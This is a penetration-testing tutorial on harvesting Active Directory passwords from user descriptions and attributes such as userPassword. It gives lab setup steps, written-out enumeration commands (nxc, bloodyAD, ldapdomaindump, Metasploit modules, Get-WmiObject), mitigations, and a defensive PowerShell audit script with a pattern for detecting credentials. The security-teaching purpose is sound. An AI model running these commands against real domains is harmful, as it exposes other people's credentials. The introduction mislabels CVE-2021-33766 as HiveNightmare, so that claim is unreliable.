Credential Dumping: AD User Comment
In this article, we look at how attackers enumerate passwords left in Active Directory user comments and password-related attributes, and how that information lets them escalate their access within an organization.
Active Directory (AD) and related services contain several critical vulnerabilities. These can expose password-related information stored in attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password. Attackers can exploit these flaws to access password hashes or even cleartext passwords, which significantly increases the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations, and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep), all of which, if exploited, can lead to unauthorized access to critical password fields in AD.
Table of Contents
Understanding of Active Directory (AD) password attributes
Prerequisites
Lab Setup
Exploitation
- nxc
- bloodyAD
- ldapdomaindump
- MetaSploit
- Get-WmiObject
Mitigation
Understanding of Active Directory (AD) password attributes:
UserPassword: In Active Directory, the UserPassword field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers obtain these hashes, they can perform offline attacks such as brute force or dictionary attacks to recover the original passwords.
UnixUserPassword: This field is used when integrating AD with Unix/Linux systems, for example through SSSD or NSS lookups configured in nsswitch.conf. It stores the password hash for Unix-based systems, which is usually in a different format (e.g., DES, SHA-512) than Windows hashes.
unicodePwd: The unicodePwd attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.
msSFU30Password: The msSFU30Password attribute is associated with the Microsoft Services for Unix (SFU) integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the unixUserPassword attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.
Prerequisites
- Windows Server 2019 as Active Directory Domain Controller
- Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
- Kali Linux
- Windows 10/11 as Client/Attacker Machine
Lab Setup
In this lab setup, we will create an AD user, add a user description that contains the user’s password, and store passwords in the “userPassword” and “unixUserPassword” attributes.
Create the AD Environment
To simulate an Active Directory environment, set up a Windows Server 2019 as a Domain Controller (DC). You will also need a client/attacker machine (Windows or Linux) to run enumeration and exploitation tools.
Domain Controller
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
- Set up the domain (e.g., “ignite.local”, as used in the commands below).
- Next, create a domain user with username “raj” and password “Password@1”.
Create an AD user and provide user description
Once the AD environment is set up, open PowerShell in Administrative mode on the Windows Server and run the two commands below. They load the ActiveDirectory module and set the “description” attribute of the user “divya” (created the same way as “raj” above) so that it contains the password.
Import-Module ActiveDirectory
Set-ADUser -Identity "divya" -Description "this is a default password =Password@123"
Using “Get-ADUser” utility and a command like below, we can confirm that a user with “divya” as username has been created along with the description provided.
Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description
Then navigate to “divya” user’s properties window by following the below steps.
Steps
- Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
- Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
- Locate user “divya” in the “Users” container.
- Right-click on “divya” user and go to “Properties”.
This action opens the “General” tab of “divya” user’s Properties window, where the “Description” that was added can be viewed and confirmed.
Update userPassword attribute:
Navigate to the “Attribute Editor” tab within “divya” user’s properties window, select the “userPassword” attribute and click the “Edit” button. This opens the “Multi-valued Octet String Editor” pop-up window; click the “Add” button in it.
Then, provide “divya” user’s password “Password@123” in its hexadecimal form within the “Value” textarea and click “OK” in the “Octet String Attribute Editor” pop-up window.
Update unixUserPassword attribute:
Similar to the steps in the “Update userPassword attribute” section above, select the “unixUserPassword” attribute and set its value to “admin@123”.
Select the “unixUserPassword” attribute and click the “Edit” button. This opens the “Multi-valued Octet String Editor” pop-up window; click the “Add” button in it.
Provide “divya” user’s Unix password “admin@123” in its hexadecimal form within the “Value” textarea and click “OK” in the “Octet String Attribute Editor” pop-up window.
Alternatively, run the command below from the PowerShell window opened in the “Create an AD user and provide user description” section to set “divya” user’s Unix password to “admin@123”.
Set-ADUser -Identity "divya" -Replace @{ uidNumber=1001; gidNumber=1001; unixHomeDirectory="/home/linux"; loginShell="/bin/bash"; unixUserPassword="admin@123" }
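The Attribute Editor expects these octet-string attributes as raw bytes, which is why the article has you type the password in hexadecimal. The following script is an added example (not code from the original article) that does the same conversion in PowerShell: it encodes both lab values as byte arrays, writes them with Set-ADUser, then reads them back and decodes them so you can confirm what the enumeration tools in the next section will see. It assumes the ActiveDirectory module is available and that the user “divya” already exists; the function names are the example’s own.

```powershell
# Added example (not from the original article): populate the lab user's
# userPassword and unixUserPassword attributes from PowerShell instead of
# typing hex into the Attribute Editor, then read them back and decode them.
# Assumes the ActiveDirectory module (on the DC or via RSAT) and that "divya" exists.
Import-Module ActiveDirectory

# Converts text to the byte array AD stores for an octet-string attribute and
# prints (with -Verbose) the hex the "Octet String Attribute Editor" would show.
function ConvertTo-OctetString {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Text)
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Text)
    $hex = ($bytes | ForEach-Object { $_.ToString('X2') }) -join ' '
    Write-Verbose ("{0} -> {1}" -f $Text, $hex)
    # Leading comma keeps the byte[] intact instead of unrolling it into the pipeline.
    return ,$bytes
}

# Decodes a single octet-string value as returned by Get-ADUser (one byte[] per value).
function ConvertFrom-OctetString {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return [System.Text.Encoding]::ASCII.GetString($Bytes)
}

$user = 'divya'   # lab account from the article

# Same values the article enters by hand; -Replace overwrites any existing values.
Set-ADUser -Identity $user -Replace @{
    userPassword     = ConvertTo-OctetString 'Password@123' -Verbose
    unixUserPassword = ConvertTo-OctetString 'admin@123' -Verbose
}

# Read back. Both attributes are multi-valued, so each stored value is its own byte[].
$u = Get-ADUser -Identity $user -Properties description, userPassword, unixUserPassword
'{0,-18} {1}' -f 'description', $u.description
foreach ($attr in 'userPassword', 'unixUserPassword') {
    foreach ($value in $u.$attr) {
        '{0,-18} {1}' -f $attr, (ConvertFrom-OctetString $value)
    }
}
```

The read-back loop is the useful half for a defender: the same decode turns the byte arrays that Get-ADUser returns into readable text, which is exactly what the LDAP enumeration tools below do on the attacker’s side.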
Exploitation
nxc
Run the command below from the Kali Linux root terminal to get the user descriptions stored in Active Directory using the “user-desc” module of the “nxc” tool.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc
Next, the “nxc” tool logs can be read with the command below to revisit the enumerated information at a later time.
cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log
In addition, run the following commands to enumerate sensitive information such as passwords.
- Enumerate AD users’ descriptions, which at times contain passwords, using the module “get-desc-users”.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users
- Enumerate the userPassword attribute of all users over LDAP, using the module “get-userPassword”.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword
- Enumerate the unixUserPassword attribute of all users over LDAP, using the module “get-unixUserPassword”.
nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword
bloodyAD
Run the command below to enumerate all users’ sensitive information stored in the “userPassword”, “unixUserPassword”, “unicodePwd” and “description” attributes.
bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePwd=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description
The output contains sensitive information such as passwords and the attacks a user is vulnerable to.
ldapdomaindump
Run the commands below to enumerate complete information about the AD under test, then navigate to the “AD_DUMP” directory and list all the files generated by the “ldapdomaindump” tool.
ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP
cd AD_DUMP
ls -al
Now, open the “domain_users.html” file in a browser. Observe that the attacker could enumerate the AD users’ “description” attribute, which gives away a user’s password or the attack technique to which the user is vulnerable.
MetaSploit
Start the Metasploit Framework Console (msfconsole) from the Kali Linux root terminal.
Use the “ldap_query” auxiliary module, set all required options and run the module to enumerate all AD users’ information.
use auxiliary/gather/ldap_query
set action ENUM_ACCOUNTS
set rhosts 192.168.1.48
set username raj
set password Password@1
set domain ignite.local
run
The output screenshot below lists the AD users along with the information stored in their AD “description” attribute.
Note: Alternatively, we may use the “enum_ad_user_comments” post module to enumerate users along with the information stored in the AD “description” attribute. Below are the commands to execute in sequence, followed by the output screenshot from the Kali Linux root terminal.
use post/windows/gather/enum_ad_user_comments
set session 1
run
Get-WmiObject
Open PowerShell in Administrative mode on a Windows client/attacker machine. Then, run the command below to enumerate information such as “username”, “SID” and “description” for the users listed in the command, using the “Get-WmiObject” utility.
Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description
Mitigation
Vulnerabilities like CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep) highlight potential risks. However, the UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password attributes do not always present a direct threat; they become exposed only under specific conditions, and attackers use various attack vectors to gain the access needed to retrieve these password-related fields from the Active Directory configuration.
Below are the best practices to follow diligently to remediate the possibility of enumerating AD users’ passwords:
Use Strong Encryption: Ensure that all communications between clients and domain controllers remain encrypted (LDAPS, SMB encryption, etc.) to prevent attackers from intercepting password hashes. Also, disable legacy authentication protocols such as NTLM where possible.
Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to only trusted & limited number of administrators.
Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.
Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.
Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.
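The “Limit Access to Password Attributes” and “Regularly Audit AD Permissions” points are easiest to act on if you first know which accounts actually carry these attributes or a password-looking description. The script below is an added example (not code from the original article) for the defender’s side: it runs one LDAP query for users with any of userPassword, unixUserPassword or msSFU30Password set, or with a description or notes (info) field present, flags the findings, and offers a pipeline to clear the offending attributes. It assumes the ActiveDirectory module; the function names and the keyword pattern are the example’s own and should be tuned to your environment.

```powershell
# Added example (not from the original article): audit every user object for
# the attributes this article shows being enumerated, flag descriptions that
# look like they carry a credential, and clear them after review.
# Assumes the ActiveDirectory module (on the DC or via RSAT).
Import-Module ActiveDirectory

# Attributes whose mere presence on a user object is a finding.
$sensitiveAttrs = 'userPassword', 'unixUserPassword', 'msSFU30Password'

# Constructed keyword pattern for description/notes text; extend for your environment.
$credentialPattern = '(?i)pass(word|wd)?\s*[:=]|pwd\s*[:=]|default password|credential'

function Get-SensitiveAttributeFindings {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    $textAttrs = 'description', 'info'   # "Description" and "Notes" in ADUC
    # One LDAP filter: any octet-string attribute present, or any free-text field set.
    $filter = '(|(userPassword=*)(unixUserPassword=*)(msSFU30Password=*)(description=*)(info=*))'

    Get-ADUser -LDAPFilter $filter -SearchBase $SearchBase -Properties ($textAttrs + $sensitiveAttrs) |
        ForEach-Object {
            $u = $_
            foreach ($attr in $sensitiveAttrs) {
                # .Count on $null is 0, so absent attributes are skipped cleanly.
                if ($u.$attr.Count -gt 0) {
                    [pscustomobject]@{ User = $u.SamAccountName; Attribute = $attr; Reason = 'attribute populated' }
                }
            }
            foreach ($attr in $textAttrs) {
                $text = [string]$u.$attr
                if ($text -and $text -match $credentialPattern) {
                    [pscustomobject]@{ User = $u.SamAccountName; Attribute = $attr; Reason = "text matches '$($Matches[0])'" }
                }
            }
        }
}

# Clears each flagged attribute; supports -WhatIf / -Confirm so review comes first.
function Remove-SensitiveAttributes {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Finding)
    process {
        if ($PSCmdlet.ShouldProcess($Finding.User, "Clear attribute $($Finding.Attribute)")) {
            Set-ADUser -Identity $Finding.User -Clear $Finding.Attribute
        }
    }
}

$findings = Get-SensitiveAttributeFindings
$findings | Format-Table -AutoSize

# Dry run first; drop -WhatIf once the list has been reviewed.
$findings | Remove-SensitiveAttributes -WhatIf
```

Against the lab above, the report lists “divya” three times (userPassword and unixUserPassword populated, and the description matching “password =”). Clearing is deliberately a separate, ShouldProcess-aware step: a flagged description is removed wholesale, so a human should confirm that nothing legitimate is lost, and the affected users should have their passwords rotated since the values have already been readable by any authenticated account.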
Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.